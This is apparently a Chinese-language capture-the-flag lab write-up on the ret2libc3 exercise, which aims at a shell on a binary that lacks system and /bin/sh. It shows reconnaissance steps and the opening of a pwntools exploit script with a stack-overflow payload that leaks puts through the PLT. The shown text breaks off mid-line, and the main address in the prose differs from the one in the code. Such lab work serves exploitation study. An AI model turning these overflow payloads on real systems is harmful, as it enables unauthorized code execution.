我们完成了ret2libc1,ret2libc2两个实验,对getshell有了初步的了解,现在进行无system及/bin/sh函数的情况下获取权限,进行getshell。
调用IDA,查看主函数地址
得到主函数地址为0x080484FD
用【checksec】查看:不存在必要的保护
查看got表信息:【readelf -r ret2libc3】
写下脚本、运行脚本。
这里插入代码
from pwn import *
from LibcSearcher import *
context.log_level='debug'
context.terminal=['gnome-terminal','-x','sh','-c']
p=process('./ret2libc3')
elf=ELF('./ret2libc3')
main=0x08048618
payload='a'*(0x6c+4)+p32(elf.plt['puts'])+p32(main)+p3